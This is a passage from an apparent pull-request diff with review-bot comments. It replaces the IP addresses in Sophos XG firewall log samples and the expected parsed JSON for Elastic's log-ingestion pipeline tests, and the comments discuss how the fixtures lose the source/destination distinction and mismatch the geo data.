hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:54 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=1881 signature_msg="SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack" classification="access to a potentially vulnerable web application" rule_priority=2 src_ip=89.40.182.58 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=41528 dst_port=80 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="server-webapp" target="Server" -<30>device="SFW" date=2020-05-18 time=14:38:55 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name="" signature_id=1616 signature_msg="PROTOCOL-DNS named version attempt" classification="Attempted Information Leak" rule_priority=1 src_ip=117.50.11.192 src_country_code=CHN dst_ip=172.16.66.155 dst_country_code=R1 protocol="UDP" src_port=58914 dst_port=53 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="protocol-dns" target="Server" -<30>device="SFW" date=2020-05-18 time=14:38:56 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=53589 signature_msg="SERVER-WEBAPP DrayTek multiple products command injection attempt" classification="Web Application Attack" rule_priority=2 src_ip=77.61.185.101 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=59476 dst_port=80 platform="Linux,Mac,Other,Unix,Windows" category="server-webapp" target="Server" +<30>device="SFW" date=2018-06-01 time=10:55:41 timezone="BST" 
device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600003 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:54 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=1881 signature_msg="SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack" classification="access to a potentially vulnerable web application" rule_priority=2 src_ip=175.16.199.1 src_country_code=ROU dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=41528 dst_port=80 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="server-webapp" target="Server" +<30>device="SFW" date=2020-05-18 time=14:38:55 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name="" signature_id=1616 signature_msg="PROTOCOL-DNS named version attempt" classification="Attempted Information Leak" rule_priority=1 src_ip=175.16.199.1 src_country_code=CHN dst_ip=175.16.199.1 dst_country_code=R1 protocol="UDP" src_port=58914 dst_port=53 
platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="protocol-dns" target="Server" +<30>device="SFW" date=2020-05-18 time=14:38:56 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=53589 signature_msg="SERVER-WEBAPP DrayTek multiple products command injection attempt" classification="Web Application Attack" rule_priority=2 src_ip=175.16.199.1 src_country_code=NLD dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=59476 dst_port=80 platform="Linux,Mac,Other,Unix,Windows" category="server-webapp" target="Server" <30>device="SFW" date=2018-05-23 time=16:20:34 timezone="BST" device_name="XG750" device_id=SFDemo-f64dd6be log_id=020703406001 log_type="IDP" log_component="Anomaly" log_subtype="Detect" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name="" signature_id=26022 signature_msg="FILE-PDF EmbeddedFile contained within a PDF" classification="A Network Trojan was detected" rule_priority=1 src_ip=10.0.0.168 src_country_code=R1 dst_ip=10.1.1.234 dst_country_code=R1 protocol="TCP" src_port=28938 dst_port=25 platform="Windows" category="Malware Communication" target="Server" <30>device="SFW" date=2018-05-23 time=16:16:43 timezone="BST" device_name="XG750" device_id=SFDemo-f64dd6be log_id=020704406002 log_type="IDP" log_component="Anomaly" log_subtype="Drop" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name="" signature_id=26022 signature_msg="FILE-PDF EmbeddedFile contained within a PDF" classification="A Network Trojan was detected" rule_priority=1 src_ip=10.0.1.31 src_country_code=R1 dst_ip=10.1.0.115 dst_country_code=R1 protocol="TCP" src_port=40140 dst_port=25 platform="Windows" category="Malware Communication" target="Server" <30>device="SFW" date=2017-01-31 time=14:52:11 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=138301618041 
log_type="Sandbox" log_component="Mail" log_subtype="Allowed" priority=Information user_name="" src_ip= filename="" filetype="" filesize=0 sha1sum="" source="" reason="eligible" destination="" subject="" 
@@ -79,11 +79,11 @@ <30>device="SFW" date=2017-01-31 time=15:28:25 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=136501618041 log_type="Sandbox" log_component="Web" log_subtype="Allowed" priority=Information user_name="" src_ip= filename="" filetype="" filesize=0 sha1sum="" source="" reason="eligible" destination="" subject="" <30>device="SFW" date=2017-01-31 time=15:28:25 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136528618043 log_type="Sandbox" log_component="Web" log_subtype="Pending" priority=Information user_name="jsmith" src_ip=10.198.47.112 filename="19.exe" filetype="application/octet-stream" filesize=153010 sha1sum="3ce799580908df9ca0dc649aa8c2d06ab267e8c8" source="10.198.241.50" reason="pending" destination="" subject="" <30>device="SFW" date=2017-01-31 time=15:28:25 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136502218042 log_type="Sandbox" log_component="Web" log_subtype="Denied" priority=Critical user_name="jsmith" src_ip=10.198.47.112 filename="19.exe" filetype="application/octet-stream" filesize=153010 sha1sum="3ce799580908df9ca0dc649aa8c2d06ab267e8c8" source="10.198.241.50" reason="cloud malicious" destination="" subject=" -<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136502218042 log_type="Sandbox" log_component="Web" log_subtype="Denied" priority=Critical user_name="" src_ip=172.16.34.24 filename="SBTestFile1.pdf" filetype="application/pdf" filesize=1124 sha1sum="d910c4a81122c360fe57f67a04999425a65249db" source="sophostest.com" reason="cached malicious" destination="" subject="" -<30>device="SFW" date=2020-05-18 time=14:38:46 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=89.68.140.204 
localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL" referer=- method=POST httpstatus=401 reason="-" extra="-" contenttype="-" useragent="Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)" host=89.68.140.204 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79 -<30>device="SFW" date=2020-05-18 time=14:38:47 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M" referer=- method=POST httpstatus=200 reason="-" extra="-" contenttype="application/mapi-http" useragent="Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)" host=89.68.140.204 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79 +<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136502218042 log_type="Sandbox" log_component="Web" log_subtype="Denied" priority=Critical user_name="" src_ip=175.16.199.1 
filename="SBTestFile1.pdf" filetype="application/pdf" filesize=1124 sha1sum="d910c4a81122c360fe57f67a04999425a65249db" source="sophostest.com" reason="cached malicious" destination="" subject="" +<30>device="SFW" date=2020-05-18 time=14:38:46 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL" referer=- method=POST httpstatus=401 reason="-" extra="-" contenttype="-" useragent="Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)" host=175.16.199.1 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79 +<30>device="SFW" date=2020-05-18 time=14:38:47 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M" referer=- method=POST httpstatus=200 reason="-" extra="-" 
contenttype="application/mapi-http" useragent="Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)" host=175.16.199.1 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79 <30>device="SFW" date=2020-05-19 time=17:20:29 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="jsmith" server=www.iviewtest.com:8989 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol="HTTP/1.1" url=/ querystring= cookie="-" referer=- method=GET httpstatus=403 reason="Static URL Hardening" extra="No signature found" contenttype="text/html" useragent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" host=10.198.235.254 responsetime=19310 bytessent=726 bytesrcv=510 fw_rule_id=3 <30>device="SFW" date=2020-05-19 time=18:03:30 timezone="IST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="jsmith" server=www.iviewtest.com:8990 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol="HTTP/1.1" url=/download/eicarcom2.zip querystring= cookie="; PHPSESSID=jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*" referer=http://www.iviewtest.com:8990/85-0-Download.html method=GET httpstatus=403 reason="Antivirus" extra="EICAR-AV-Test" contenttype="text/html" useragent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" host=10.198.235.254 responsetime=403214 bytessent=739 bytesrcv=715 fw_rule_id=6 -<30>device="SFW" date=2020-05-20 time=18:03:31 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=- sourceip=83.97.20.30 localip=216.167.51.72 ws_protocol="HTTP/1.0" url=/ querystring="" cookie="-" referer="-" method=GET 
httpstatus=403 reason="WAF Anomaly" extra="Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header" contenttype="text/html" useragent="-" host=83.97.20.30 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3 +<30>device="SFW" date=2020-05-20 time=18:03:31 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=- sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol="HTTP/1.0" url=/ querystring="" cookie="-" referer="-" method=GET httpstatus=403 reason="WAF Anomaly" extra="Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header" contenttype="text/html" useragent="-" host=175.16.199.1 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3 <30>device="SFW" date=2017-02-01 time=14:17:35 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=106025618011 log_type="Wireless Protection" log_component="Wireless Protection" log_subtype="Information" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_SSID=2 <30>device="SFW" date=2017-02-01 time=14:19:47 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=106025618011 log_type="Wireless Protection" log_component="Wireless Protection" log_subtype="Information" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_SSID=3 diff --git a/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json b/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json index 3ad283e42e4..88c4c6cf9dd 100644 --- a/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json +++ b/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json 
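Review bot: The rewritten WAF records at the end of this hunk carry the same address in `sourceip`, `localip` and `host` (all `175.16.199.1`), so the fixture can no longer distinguish the client side from the server side, and a pipeline regression that swapped `source.ip` and `destination.ip` would likely still pass. Prefer two distinct addresses from the supported test subset, for example keep `175.16.199.1` for `sourceip`/`host` and put `localip` on a second documented address. The same collapse of src and dst onto one value appears in the IDP records of the preceding hunk and in the `client.ip`/`server.ip` pairs of the expected JSON hunks that follow. Separately, the Sandbox record's former `src_ip=172.16.34.24` was already a private (RFC 1918) address and did not need replacing; moving it to a public one changes which sample exercises the non-enriched path, which may be intended but deserves a mention in the description.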
@@ -72,7 +72,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566058500Z", + "ingested": "2021-12-09T13:44:55.714793100Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:48 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=041101618035 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"firewall@firewallgate.com\" to_email_address=\"Sysadmin@elasticuser.com\" email_subject=\"*ALERT* Sophos XG Firewall\" mailid=\"qkW2Y6-LxBk6U-vH-1590055245\" mailsize=19728 spamaction=\"QUEUED\" reason=\"Email has been accepted by Device and queued for scanning.\" src_domainname=\"elasticuser.com\" dst_domainname=\"\" src_ip=\"\" src_country_code=\"\" dst_ip=\"\" dst_country_code=\"\" protocol=\"TCP\" src_port=0 dst_port=0 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041101618035", "kind": "event", @@ -91,28 +91,27 @@ "server": { "port": 25, "bytes": 0, - "ip": "185.8.209.194" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "CH-VD", - "city_name": "Saint-Prex", - "country_iso_code": "CH", - "country_name": "Switzerland", - "region_name": "Vaud", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.4599, - "lat": 46.4796 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 199567, + "number": 4837, "organization": { - "name": "Fr. Sauter AG" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, 
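Review bot: `event.ingested` is rewritten here and again in the `@@ -197`, `@@ -326` and `@@ -454` hunks, yet it is a wall-clock value that changes on every regeneration and is unrelated to the IP change this commit makes. If the pipeline test config for this data stream does not already exclude it, declaring it as a dynamic field (elastic-package's `dynamic_fields` entry, e.g. `dynamic_fields: { event.ingested: ".*" }`) would keep future fixture diffs limited to meaningful changes. The point applies to every expected-output hunk in this file, so it is raised once here.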
@@ -120,30 +119,29 @@
 "email": "info@pelasticuser.com"
 },
 "bytes": 0,
- "ip": "185.8.209.194"
+ "ip": "175.16.199.1"
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Miami",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Florida",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1826,
- "lat": 25.7806
- }
+ "lon": 125.3228,
+ "lat": 43.88
+ },
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 199524,
+ "number": 4837,
 "organization": {
- "name": "G-Core Labs S.A."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 52742,
 "bytes": 0,
- "ip": "92.38.133.63",
+ "ip": "175.16.199.1",
 "domain": "constant-big.email",
 "user": {
 "email": "telekommunikation@constant-big.email"
@@ -197,12 +195,12 @@ "client": { "port": 52742, "bytes": 0, - "ip": "92.38.133.63" + "ip": "175.16.199.1" }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566069500Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:49 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=041105613003 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Clean\" status=\"\" priority=Information fw_rule_id=22 user_name=\"\" av_policy_name=\"Default\" from_email_address=\"telekommunikation@constant-big.email\" to_email_address=\"info@pelasticuser.com\" email_subject=\"Telefonservice statt Anrufbeantworter\" mailid=\"\u003cMzQ4NzU1ODA4Mw==.70c409993fe53cb7c5e32c9974adf8ff@constant-big\" mailsize=13371 spamaction=\"Accept\" reason=\"Mail is Clean.\" src_domainname=\"constant-big.email\" dst_domainname=\"\" src_ip=92.38.133.63 src_country_code=USA dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=52742 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", + "ingested": "2021-12-09T13:44:55.714802Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:49 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=041105613003 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Clean\" status=\"\" priority=Information fw_rule_id=22 user_name=\"\" av_policy_name=\"Default\" from_email_address=\"telekommunikation@constant-big.email\" to_email_address=\"info@pelasticuser.com\" email_subject=\"Telefonservice statt Anrufbeantworter\" mailid=\"\u003cMzQ4NzU1ODA4Mw==.70c409993fe53cb7c5e32c9974adf8ff@constant-big\" mailsize=13371 spamaction=\"Accept\" reason=\"Mail is Clean.\" src_domainname=\"constant-big.email\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=USA dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=52742 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041105613003", "kind": "event", "action": "Clean", 
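Review bot: In the new `event.original` of this hunk both `src_ip` and `dst_ip` are `175.16.199.1` while the vendor fields still read `src_country_code=USA` and `dst_country_code=DEU`, and the enriched `source.geo`/`destination.geo` in the `@@ -120` and `@@ -91` hunks above now both resolve to `CN`/`CN-JL` with AS 4837 on each side. The sample therefore contradicts itself: a reader cannot tell from the fixture whether the `*.geo` fields come from GeoIP lookup or from the vendor's country codes, and identical source and destination enrichment hides any mix-up between the two. If the pipeline maps `src_country_code`/`dst_country_code` into any ECS field, consider updating those tokens to agree with the new addresses; if it does not, a short note in the description that the vendor codes are intentionally left stale would avoid the same question on the next regeneration. The `@@ -326` and `@@ -454` hunks show the same pattern.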
@@ -220,28 +218,27 @@
 "server": {
 "port": 25,
 "bytes": 0,
- "ip": "185.8.209.194"
+ "ip": "175.16.199.1"
 },
 "log": {
 "level": "warning"
 },
 "destination": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "CH-VD",
- "city_name": "Saint-Prex",
- "country_iso_code": "CH",
- "country_name": "Switzerland",
- "region_name": "Vaud",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": 6.4599,
- "lat": 46.4796
- }
+ "lon": 125.3228,
+ "lat": 43.88
+ },
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 199567,
+ "number": 4837,
 "organization": {
- "name": "Fr. Sauter AG"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 25,
@@ -249,30 +246,29 @@
 "email": "hein.mueck@elasticuser.de"
 },
 "bytes": 0,
- "ip": "185.8.209.194"
+ "ip": "175.16.199.1"
 },
 "source": {
 "geo": {
- "continent_name": "South America",
- "region_iso_code": "BR-SP",
- "city_name": "Cabreuva",
- "country_iso_code": "BR",
- "country_name": "Brazil",
- "region_name": "Sao Paulo",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": -47.0763,
- "lat": -23.3149
- }
+ "lon": 125.3228,
+ "lat": 43.88
+ },
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 262696,
+ "number": 4837,
 "organization": {
- "name": "Turbonet Telecomunicações"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 51789,
 "bytes": 0,
- "ip": "187.95.82.175",
+ "ip": "175.16.199.1",
 "domain": "17buddies.net",
 "user": {
 "email": "ripxfc@17buddies.net"
@@ -326,12 +322,12 @@ "client": { "port": 51789, "bytes": 0, - "ip": "187.95.82.175" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566077400Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:50 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=041107413001 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"Spam\" from_email_address=\"ripxfc@17buddies.net\" to_email_address=\"hein.mueck@elasticuser.de\" email_subject=\"nimm dringend Geld\" mailid=\"\u003coE6Bl1v.H9RXAIt.N5WB1my7xW.JavaMail.app@9in8-vovZnu.prod.17bud\" mailsize=2025 spamaction=\"Reject\" reason=\"Mail detected as SPAM.\" src_domainname=\"17buddies.net\" dst_domainname=\"\" src_ip=187.95.82.175 src_country_code=BRA dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=51789 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", + "ingested": "2021-12-09T13:44:55.714808300Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:50 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=041107413001 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"Spam\" from_email_address=\"ripxfc@17buddies.net\" to_email_address=\"hein.mueck@elasticuser.de\" email_subject=\"nimm dringend Geld\" mailid=\"\u003coE6Bl1v.H9RXAIt.N5WB1my7xW.JavaMail.app@9in8-vovZnu.prod.17bud\" mailsize=2025 spamaction=\"Reject\" reason=\"Mail detected as SPAM.\" src_domainname=\"17buddies.net\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=BRA dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=51789 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", "code": "041107413001", "kind": "alert", "action": "Spam", 
@@ -351,28 +347,27 @@ "server": { "port": 25, "bytes": 0, - "ip": "185.8.209.194" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "CH-VD", - "city_name": "Saint-Prex", - "country_iso_code": "CH", - "country_name": "Switzerland", - "region_name": "Vaud", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.4599, - "lat": 46.4796 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 199567, + "number": 4837, "organization": { - "name": "Fr. Sauter AG" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -380,27 +375,29 @@ "email": "info@elasticuser.com" }, "bytes": 0, - "ip": "185.8.209.194" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "United Kingdom", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -0.1224, - "lat": 51.4964 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "GB" + "country_iso_code": "CN" }, "as": { - "number": 12488, + "number": 4837, "organization": { - "name": "Krystal Hosting Ltd" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 55002, "bytes": 0, - "ip": "77.72.3.56", + "ip": "175.16.199.1", "domain": "ELTOBGI.COM", "user": { "email": "SHERIF.TOBGI@ELTOBGI.COM" 
@@ -454,12 +451,12 @@ "client": { "port": 55002, "bytes": 0, - "ip": "77.72.3.56" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566082100Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=045908413004 log_type=\"Anti-Spam\" log_component=\"SMTPS\" log_subtype=\"Probable Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"rule3\" from_email_address=\"SHERIF.TOBGI@ELTOBGI.COM\" to_email_address=\"info@elasticuser.com\" email_subject=\"09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20\" mailid=\"\u003c20200518070235.C1623996C64F9957@ELTOBGI.COM\u003e\" mailsize=1032152 spamaction=\"Prefix Subject\" reason=\"Sender IP address is blacklisted.\" src_domainname=\"ELTOBGI.COM\" dst_domainname=\"\" src_ip=77.72.3.56 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"RBL\"", + "ingested": "2021-12-09T13:44:55.714814200Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=045908413004 log_type=\"Anti-Spam\" log_component=\"SMTPS\" 